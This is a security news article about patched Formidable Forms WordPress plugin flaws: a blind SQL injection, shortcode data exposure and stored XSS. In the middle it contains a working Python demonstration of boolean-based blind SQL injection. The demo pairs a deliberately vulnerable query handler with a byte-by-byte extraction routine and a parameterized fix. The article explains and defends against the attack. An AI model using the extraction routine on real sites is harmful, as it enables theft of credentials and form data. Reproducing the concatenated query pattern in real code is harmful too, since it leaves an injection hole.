Vulnerabilities in Formidable Forms Plugin Expose WordPress Sites to Attacks

A security researcher identified multiple vulnerabilities in the Formidable Forms WordPress plugin that put hundreds of thousands of sites at risk.

WordPress is the most popular content management system used by millions around the globe, and it is fully customizable with a large number of plugins available for users’ websites.

However, newly disclosed vulnerabilities in a popular plugin named Formidable Forms should be a warning to all of the plugin's users.

Over the years, most WordPress users and administrators have become familiar with the Formidable Forms plugin.

The developers offer both a free and a paid version of the plugin, which makes it easy to build forms, polls, surveys and other pages that collect information from a large group of users.

With more than 200,000 active users, the plugin is an attractive target for attackers seeking large data sets of submitted information.

The vulnerabilities were identified by Klikki Oy, a Finland-based cybersecurity firm.

The bad news is that not just one but multiple vulnerabilities were identified in the plugin, and exploiting them could put an entire website at risk.

Because the plugin stores the data it collects in the site's own database, and a single administrative account controls the whole site, a successful attack could take a site down or expose the data held inside it.

Among the vulnerabilities, Jouko Pynnönen, the Klikki Oy researcher who found the issues, confirmed that the most serious is a blind SQL injection.


If exploited, this vulnerability gives an attacker read access to the site's database contents, which they can then use however they choose.

That includes user credentials stored by WordPress and the data that visitors have submitted through Formidable Forms.
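The article does not describe the plugin's vulnerable code, so the following is a generic illustration added here, not Formidable Forms code: it shows what "blind" means in practice. A hypothetical handler pastes a caller-supplied form ID into a query; the server never echoes query results, only whether any rows matched, yet an attacker can still recover an arbitrary database value byte by byte using a binary search over true/false responses. The hardened handler binds the value as a parameter (the equivalent of `$wpdb->prepare()` in WordPress). The table, rows and function names are constructed for the example and use SQLite in place of MySQL.

```python
import sqlite3

# Constructed target: the value the attacker wants to read (row id 2 below).
TARGET = "SELECT value FROM entries WHERE id = 2"


def build_db():
    """Constructed sample data, not from the page: a stand-in for a form-entries table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE entries (id INTEGER PRIMARY KEY, form_id INTEGER, value TEXT)")
    conn.executemany(
        "INSERT INTO entries (form_id, value) VALUES (?, ?)",
        [(1, "alice@example.com"), (1, "s3cr3t-token"), (2, "bob@example.com")],
    )
    conn.commit()
    return conn


def count_entries_vulnerable(conn, form_id):
    """Hypothetical vulnerable handler: the caller-supplied form_id is concatenated into SQL."""
    sql = "SELECT COUNT(*) FROM entries WHERE form_id = " + str(form_id)
    return conn.execute(sql).fetchone()[0]


def count_entries_fixed(conn, form_id):
    """Hardened handler: coerce to int and bind it as a query parameter."""
    sql = "SELECT COUNT(*) FROM entries WHERE form_id = ?"
    return conn.execute(sql, (int(form_id),)).fetchone()[0]


def blind_extract(oracle, target_query, max_len=64):
    """Boolean-based blind extraction.

    oracle(cond) must return True iff the SQL condition `cond` evaluates to true
    once injected. Each character of the target string is recovered by a binary
    search over its code point (7 oracle calls per character for 7-bit ASCII).
    """
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            cond = "unicode(substr((%s), %d, 1)) > %d" % (target_query, pos, mid)
            if oracle(cond):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            # substr() past the end of the string yields '', unicode('') is NULL,
            # so every comparison is false and the search bottoms out at 0: done.
            break
        out += chr(lo)
    return out


def run_demo():
    """Returns (leaked value, number of requests used, whether the fixed handler rejected the payload)."""
    conn = build_db()
    requests = []

    def oracle(cond):
        # The injection rides on a legitimate-looking form_id of 1; the only
        # signal the attacker observes is whether the row count is nonzero.
        payload = "1 AND (" + cond + ")"
        requests.append(payload)
        return count_entries_vulnerable(conn, payload) > 0

    leaked = blind_extract(oracle, TARGET)

    # The same payload against the parameterized handler never reaches the
    # SQL engine: int() rejects it before the query is built.
    try:
        count_entries_fixed(conn, "1 AND (1=1)")
        fixed_blocked = False
    except ValueError:
        fixed_blocked = True
    return leaked, len(requests), fixed_blocked


if __name__ == "__main__":
    leaked, n, blocked = run_demo()
    print("leaked %r in %d requests; fixed handler rejected payload: %s" % (leaked, n, blocked))
```

The point of the demo is the request count: a dozen characters cost under a hundred requests, so a blind injection in a plugin with a large install base is a practical route to credentials and submitted form data, not a theoretical one. Where a form ID cannot simply be cast to an integer, the fix is still parameter binding, never string concatenation.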

A further vulnerability allows a third party to read data that other users have entered into a form.

It stems from the plugin's handling of shortcodes, a feature originally intended to let site owners customize WordPress pages with minimal effort, but which in this case could be abused to expose submitted entries.

Apart from these issues, the Formidable Forms plugin also has XSS vulnerabilities.

The stored XSS lets an attacker plant arbitrary JavaScript that runs in the browser of anyone who views the affected form or its entries, including site administrators; with an administrator's session, the attacker can take control of the forms and, from there, the whole site.

According to the Formidable Forms development team, all of the identified vulnerabilities were fixed after the researcher reported them.

The latest version of the plugin, 2.05.03, puts an end to all of the reported problems.

For his work, Pynnönen received a bounty of $4,500 plus additional rewards for the SQL injection and XSS findings through the plugin's HackerOne bug bounty program.
